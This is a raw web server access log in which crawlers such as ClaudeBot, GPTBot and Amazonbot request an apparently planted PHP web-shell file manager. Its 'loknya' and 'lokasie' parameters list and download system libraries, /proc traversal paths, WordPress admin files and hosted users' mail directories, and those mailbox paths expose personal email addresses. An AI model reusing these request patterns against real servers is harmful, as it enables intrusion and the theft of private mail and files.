216.73.216.243 - - [07/Jul/2025:08:18:55 -0400] "GET /228ef4/index.php?loknya=%2Fhome%2Fakhalid%2Fmail%2F.info%40saitoncompany_com%2F.Trash HTTP/1.1" 200 8515 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:18:55 -0400] "GET /228ef4/?loknya=%2Fhome%2Fakhalid%2Flscache%2F9%2F0 HTTP/1.1" 200 8477 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:18:55 -0400] "GET /228ef4/?loknya=%2Fhome%2Fakhalid%2Flscache%2F1%2F8 HTTP/1.1" 200 8476 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:18:56 -0400] "GET /228ef4/?lokasie=%2Fhome%2Fakhalid%2Ffirst-gulf.com.sa%2Fwp-admin%2Foptions-head.php&loknya=%2Fhome%2Fakhalid%2Ffirst-gulf.com.sa%2Fwp-admin HTTP/1.1" 200 8236 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
44.212.106.171 - - [07/Jul/2025:08:18:56 -0400] "GET /228ef4/?loknya=/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/opt/alt/alt-nodejs9/root HTTP/1.1" 200 8842 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.243 - - [07/Jul/2025:08:18:56 -0400] "GET /228ef4/?loknya=%2Fhome%2Fakhalid%2F.caldav%2Fusama%40shabwahrefinery.com%2Ftasks HTTP/1.1" 200 8123 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:18:56 -0400] "GET /228ef4/?loknya=%2Fproc%2Fnet%2Frpc HTTP/1.1" 200 8109 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:18:56 -0400] "GET /228ef4/index.php?lokasie=%2Flib64%2FlibQt5XcbQpa.so.5.15.3&loknya=%2Flib64 HTTP/1.1" 200 484113 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:18:56 -0400] "GET /228ef4/?lokasie=%2Flib64%2Fpgsql%2Futf8_and_iso8859.so&loknya=%2Flib64%2Fpgsql HTTP/1.1" 200 13456 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
20.171.207.219 - - [07/Jul/2025:08:18:56 -0400] "GET /228ef4/index.php?loknya=%2F.%2Fproc%2Fthread-self%2Froot%2Fusr%2Fshare%2Flocale%2Fzh%2F HTTP/1.1" 200 8314 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.243 - - [07/Jul/2025:08:18:56 -0400] "GET /228ef4/?lokasie=%2Flib%2Ffirmware%2Fiwlwifi-so-a0-jf-b0-72.ucode&loknya=%2Flib%2Ffirmware HTTP/1.1" 200 499408 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:18:57 -0400] "GET /228ef4/index.php?loknya=%2Flib%2Flocale HTTP/1.1" 200 9062 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:18:56 -0400] "GET /228ef4/index.php?lokasie=%2Flib64%2Flibpulse-simple.so.0&loknya=%2Flib64 HTTP/1.1" 200 14175 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:18:56 -0400] "GET /228ef4/index.php?lokasie=%2Flib64%2Flibssl.so.1.1&loknya=%2Flib64 HTTP/1.1" 200 225638 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:18:57 -0400] "GET /228ef4/?loknya=%2Fhome%2Fakhalid%2Flscache%2F0%2Fe%2F2 HTTP/1.1" 200 8614 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:18:56 -0400] "GET /228ef4/index.php?lokasie=%2Flib64%2Flibruby.so.2.5.9&loknya=%2Flib64 HTTP/1.1" 200 1128174 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:18:57 -0400] "GET /228ef4/?loknya=%2Fhome%2Fakhalid%2Flscache%2F0%2F3%2F0 HTTP/1.1" 200 8824 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:18:56 -0400] "GET /228ef4/?lokasie=%2Flib%2Ffirmware%2Fiwlwifi-so-a0-gf4-a0-72.ucode&loknya=%2Flib%2Ffirmware HTTP/1.1" 200 571597 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:18:57 -0400] "GET /228ef4/index.php?lokasie=%2Flib64%2Flibgd.so.3.0.5&loknya=%2Flib64 HTTP/1.1" 200 131370 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:18:57 -0400] "GET /228ef4/index.php?loknya=%2Fhome%2Fakhalid%2Fhytham.live%2F.well-known%2Fpki-validation HTTP/1.1" 200 8329 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:18:56 -0400] "GET /228ef4/?lokasie=%2Flib%2Ffirmware%2Fiwlwifi-so-a0-gf-a0-79.ucode&loknya=%2Flib%2Ffirmware HTTP/1.1" 200 596802 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:18:58 -0400] "GET /228ef4/?loknya=%2Fhome%2Fakhalid%2Flscache%2Fe%2Fb HTTP/1.1" 200 8474 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:18:58 -0400] "GET /228ef4/?lokasie=%2Fhome%2Fakhalid%2Ffirst-gulf.com.sa%2Fwp-admin%2Findex.php&loknya=%2Fhome%2Fakhalid%2Ffirst-gulf.com.sa%2Fwp-admin HTTP/1.1" 200 11045 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
20.171.207.219 - - [07/Jul/2025:08:18:58 -0400] "GET /228ef4/index.php?loknya=%2F.%2Fproc%2Fthread-self%2Froot%2Fusr%2Fshare%2Flocale%2Fkut%2F HTTP/1.1" 200 8271 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.243 - - [07/Jul/2025:08:18:58 -0400] "GET /228ef4/?lokasie=%2Flib%2Fsystemd%2Fuser%2Fshutdown.target&loknya=%2Flib%2Fsystemd%2Fuser HTTP/1.1" 200 8116 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:18:58 -0400] "GET /228ef4/?loknya=%2Fhome%2Fakhalid%2Fmail%2F2az.dev%2Finfo%2Fnew HTTP/1.1" 200 8157 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:18:58 -0400] "GET /228ef4/index.php?lokasie=%2Flib64%2Flibinput.so.10&loknya=%2Flib64 HTTP/1.1" 200 134614 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:18:58 -0400] "GET /228ef4/?lokasie=%2Flib%2Ffirmware%2FTAS2XXX3F201.bin&loknya=%2Flib%2Ffirmware HTTP/1.1" 200 15595 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:18:58 -0400] "GET /228ef4/?lokasie=%2Fhome%2Fakhalid%2Fmail%2F.wajdie%40maxsym_co%2Fdovecot.index.log&loknya=%2Fhome%2Fakhalid%2Fmail%2F.wajdie%40maxsym_co HTTP/1.1" 200 8153 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:18:58 -0400] "GET /228ef4/?loknya=%2Fhome%2Fakhalid%2Flscache%2F6%2F0 HTTP/1.1" 200 8530 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:18:58 -0400] "GET /228ef4/?lokasie=%2Fhome%2Fakhalid%2Fmail%2F.admin%402az_dev%2Fdovecot-uidvalidity&loknya=%2Fhome%2Fakhalid%2Fmail%2F.admin%402az_dev HTTP/1.1" 200 7862 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:18:58 -0400] "GET /228ef4/?loknya=%2Fhome%2Fakhalid%2Flscache%2F4%2F0 HTTP/1.1" 200 8485 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:18:58 -0400] "GET /228ef4/index.php?loknya=%2Flib64%2Fxtables HTTP/1.1" 200 11272 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:18:58 -0400] "GET /228ef4/?loknya=%2Flib%2Ffirmware%2Fairoha HTTP/1.1" 200 8334 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:18:59 -0400] "GET /228ef4/index.php?lokasie=%2Fhome%2Fakhalid%2Fmail%2F.ameen%40maxsym_co%2Fdovecot-uidvalidity&loknya=%2Fhome%2Fakhalid%2Fmail%2F.ameen%40maxsym_co HTTP/1.1" 200 7865 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
20.171.207.219 - - [07/Jul/2025:08:18:59 -0400] "GET /228ef4/index.php?loknya=%2F.%2Fproc%2Fthread-self%2Froot%2Fusr%2Fshare%2Flocale%2Faus%2FLC_MESSAGES HTTP/1.1" 200 8182 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.243 - - [07/Jul/2025:08:18:58 -0400] "GET /228ef4/index.php?lokasie=%2Flib64%2Flibapr-1.so.0.6.3&loknya=%2Flib64 HTTP/1.1" 200 104277 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:18:59 -0400] "GET /228ef4/index.php?lokasie=%2Flib64%2FlibXau.so.6.0.0&loknya=%2Flib64 HTTP/1.1" 200 13337 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:18:59 -0400] "GET /228ef4/?loknya=%2Fhome%2Fakhalid%2Flscache%2F1%2F2 HTTP/1.1" 200 8480 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:18:59 -0400] "GET /228ef4/index.php?lokasie=%2Fsbin%2Fnamed-compilezone&loknya=%2Fsbin HTTP/1.1" 200 19629 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:18:59 -0400] "GET /228ef4/index.php?lokasie=%2Fhome%2Fakhalid%2Faccess-logs%2Fomerysh.com.maxsym.co&loknya=%2Fhome%2Fakhalid%2Faccess-logs HTTP/1.1" 200 7863 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:18:59 -0400] "GET /228ef4/index.php?lokasie=%2Flib64%2Flibldap.so&loknya=%2Flib64 HTTP/1.1" 200 136668 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:18:59 -0400] "GET /228ef4/?lokasie=%2Fusr%2Flib64%2Faspell-0.60%2Fcp1250.cmap&loknya=%2Fusr%2Flib64%2Faspell-0.60 HTTP/1.1" 200 13947 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:18:59 -0400] "GET /228ef4/?lokasie=%2Flib%2Ffirmware%2Fusbduxfast_firmware.bin&loknya=%2Flib%2Ffirmware HTTP/1.1" 200 8259 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:18:59 -0400] "GET /228ef4/index.php?lokasie=%2Flib64%2Flibhwy_test.so.1&loknya=%2Flib64 HTTP/1.1" 200 11733 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:19:00 -0400] "GET /228ef4/?loknya=%2Fhome%2Fakhalid%2Flscache%2F0%2Fe%2F9 HTTP/1.1" 200 8793 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
20.171.207.219 - - [07/Jul/2025:08:19:00 -0400] "GET /228ef4/index.php?loknya=%2F.%2Fproc%2Fthread-self%2Froot%2Fusr%2Fshare%2Flocale%2Fse%2FLC_MESSAGES HTTP/1.1" 200 8182 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.243 - - [07/Jul/2025:08:19:00 -0400] "GET /228ef4/index.php?lokasie=%2Flib64%2Flibsecureio.so&loknya=%2Flib64 HTTP/1.1" 200 12941 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:19:00 -0400] "GET /228ef4/?lokasie=%2Fhome%2Fakhalid%2Fmail%2F.ali%40elfanareng_com%2Fdovecot.list.index.log&loknya=%2Fhome%2Fakhalid%2Fmail%2F.ali%40elfanareng_com HTTP/1.1" 200 8945 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
54.87.62.248 - - [07/Jul/2025:08:19:00 -0400] "GET /228ef4/?lokasie=/proc/thread-self/root/proc/thread-self/root/home/akhalid/shabwahrefinery.com/wp-includes/blocks/navigation-submenu/editor-rtl.css&loknya=/proc/thread-self/root/proc/thread-self/root/home/akhalid/shabwahrefinery.com/wp-includes/blocks/navigation-submenu HTTP/1.1" 200 8223 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.243 - - [07/Jul/2025:08:18:59 -0400] "GET /228ef4/index.php?lokasie=%2Flib64%2Flibguile-2.0.so.22.8.1&loknya=%2Flib64 HTTP/1.1" 200 531537 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:18:59 -0400] "GET /228ef4/?lokasie=%2Flib%2Ffirmware%2Fiwlwifi-QuZ-a0-jf-b0-59.ucode&loknya=%2Flib%2Ffirmware HTTP/1.1" 200 466907 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:19:01 -0400] "GET /228ef4/index.php?loknya=%2Fhome%2Fakhalid%2F.caldav%2F HTTP/1.1" 200 9346 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:19:01 -0400] "GET /228ef4/?loknya=%2Fhome%2Fakhalid%2F.cagefs%2Fvar%2Fcache HTTP/1.1" 200 8282 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:18:58 -0400] "GET /228ef4/index.php?lokasie=%2Flib64%2Flibgtk-x11-2.0.so.0&loknya=%2Flib64 HTTP/1.1" 200 1884882 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
20.171.207.219 - - [07/Jul/2025:08:19:01 -0400] "GET /228ef4/index.php?loknya=%2F.%2Fproc%2Fthread-self%2Froot%2Fusr%2Fshare%2Flocale%2Fnv%2FLC_MESSAGES HTTP/1.1" 200 8363 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.243 - - [07/Jul/2025:08:19:01 -0400] "GET /228ef4/?loknya=%2Fhome%2Fakhalid%2Flscache%2F0%2Fe%2Fe HTTP/1.1" 200 8660 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:19:01 -0400] "GET /228ef4/index.php?lokasie=%2Flib64%2Flibnet.so.1&loknya=%2Flib64 HTTP/1.1" 200 47465 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:19:01 -0400] "GET /228ef4/index.php?loknya=%2Fhome%2Fakhalid%2Fmail%2F.spam%2Ftmp HTTP/1.1" 200 8147 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:19:01 -0400] "GET /228ef4/index.php?lokasie=%2Flib64%2Flibsecret-1.so.0.0.0&loknya=%2Flib64 HTTP/1.1" 200 121784 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:19:01 -0400] "GET /228ef4/?loknya=%2Fhome%2Fakhalid%2Flscache%2F7%2F2 HTTP/1.1" 200 8474 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:19:02 -0400] "GET /228ef4/?lokasie=%2Fhome%2Fakhalid%2Ffirst-gulf.com.sa%2Fwp-admin%2Foptions-general.php&loknya=%2Fhome%2Fakhalid%2Ffirst-gulf.com.sa%2Fwp-admin HTTP/1.1" 200 15059 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:19:02 -0400] "GET /228ef4/?lokasie=%2Flib64%2Fxtables%2Flibxt_TOS.so&loknya=%2Flib64%2Fxtables HTTP/1.1" 200 12492 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:19:02 -0400] "GET /228ef4/?loknya=%2Fhome%2Fakhalid%2Flscache%2F1%2F9 HTTP/1.1" 200 8490 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:19:02 -0400] "GET /228ef4/?loknya=%2Fusr%2Flib64%2Fwireshark HTTP/1.1" 200 8745 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:19:02 -0400] "GET /228ef4/?loknya=%2Fopt%2Falt%2Flibheif HTTP/1.1" 200 8269 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:19:02 -0400] "GET /228ef4/index.php?lokasie=%2Flib64%2Flibc.so&loknya=%2Flib64 HTTP/1.1" 200 7968 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
20.171.207.219 - - [07/Jul/2025:08:19:02 -0400] "GET /228ef4/index.php?loknya=%2F.%2Fproc%2Fthread-self%2Froot%2Fusr%2Fshare%2Flocale%2Ffan%2FLC_MESSAGES HTTP/1.1" 200 8147 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.243 - - [07/Jul/2025:08:19:02 -0400] "GET /228ef4/index.php?lokasie=%2Fhome%2Fakhalid%2Fmail%2F.maliy%40nas-yemen_org%2Fdovecot.index.log&loknya=%2Fhome%2Fakhalid%2Fmail%2F.maliy%40nas-yemen_org HTTP/1.1" 200 8261 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:19:02 -0400] "GET /228ef4/?loknya=%2Fhome%2Fakhalid%2Flscache%2F1%2Fe HTTP/1.1" 200 8489 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:19:02 -0400] "GET /228ef4/index.php?lokasie=%2Flib64%2Flibcom_err.so&loknya=%2Flib64 HTTP/1.1" 200 14232 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:19:02 -0400] "GET /228ef4/?loknya=%2Flib%2Ffirmware%2Flibertas HTTP/1.1" 200 8675 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:19:02 -0400] "GET /228ef4/index.php?lokasie=%2Flib64%2Flibpcre2-8.so.0.7.1&loknya=%2Flib64 HTTP/1.1" 200 201957 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:19:02 -0400] "GET /228ef4/?loknya=%2Fhome%2Fakhalid%2Flscache%2F0%2F1%2Fa HTTP/1.1" 200 8732 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:19:03 -0400] "GET /228ef4/index.php?lokasie=%2Flib64%2Flibgdbm_compat.so.4&loknya=%2Flib64 HTTP/1.1" 200 13103 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:19:03 -0400] "GET /228ef4/?loknya=%2Fhome%2Fakhalid%2Fmail%2F.maliy%40nas-yemen_org%2Ftmp HTTP/1.1" 200 8127 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:19:03 -0400] "GET /228ef4/?loknya=%2Fhome%2Fakhalid%2F.caldav%2Fwajdie%40maxsym.co%2Ftasks HTTP/1.1" 200 8121 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:19:03 -0400] "GET /228ef4/index.php?lokasie=%2Flib64%2Flibgpg-error.so.0&loknya=%2Flib64 HTTP/1.1" 200 63703 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:19:03 -0400] "GET /wp-includes/js/tinymce/plugins/media HTTP/1.1" 301 795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:19:03 -0400] "GET /228ef4/index.php?lokasie=%2Fhome%2Fakhalid%2Fmail%2F.ameen%40maxsym_co%2Fdovecot.mailbox.log&loknya=%2Fhome%2Fakhalid%2Fmail%2F.ameen%40maxsym_co HTTP/1.1" 200 7907 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
20.171.207.219 - - [07/Jul/2025:08:19:03 -0400] "GET /228ef4/index.php?loknya=%2F.%2Fproc%2Fthread-self%2Froot%2Fusr%2Fshare%2Flocale%2Fso%2F HTTP/1.1" 200 8311 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.243 - - [07/Jul/2025:08:19:03 -0400] "GET /228ef4/?lokasie=%2Fhome%2Fakhalid%2F.MirrorSearch%2Fcpanmetadb.cpanel.net%2Fpingtimes%2F208.74.120.197&loknya=%2Fhome%2Fakhalid%2F.MirrorSearch%2Fcpanmetadb.cpanel.net%2Fpingtimes HTTP/1.1" 200 7909 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:19:03 -0400] "GET /228ef4/?lokasie=%2Fusr%2Flib64%2Faspell-0.60%2Fiso-8859-3.cmap&loknya=%2Fusr%2Flib64%2Faspell-0.60 HTTP/1.1" 200 13497 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:19:03 -0400] "GET /228ef4/index.php?lokasie=%2Flib64%2Flibbind9.so.161.0.4&loknya=%2Flib64 HTTP/1.1" 200 36442 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:19:04 -0400] "GET /228ef4/?lokasie=%2Fhome%2Fakhalid%2Fmail%2F.ali%40ibrenergy_com%2Fsubscriptions&loknya=%2Fhome%2Fakhalid%2Fmail%2F.ali%40ibrenergy_com HTTP/1.1" 200 7890 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:19:03 -0400] "GET /228ef4/index.php?lokasie=%2Flib64%2Flibc.so.6&loknya=%2Flib64 HTTP/1.1" 200 792668 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:19:04 -0400] "GET /228ef4/?loknya=%2Fhome%2Fakhalid%2Fsaitoncompany.com%2Fwp-admin%2Fimages HTTP/1.1" 200 10224 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
100.29.128.75 - - [07/Jul/2025:08:19:04 -0400] "GET /228ef4/?loknya=/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/home/akhalid/mail/tmp HTTP/1.1" 200 8357 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
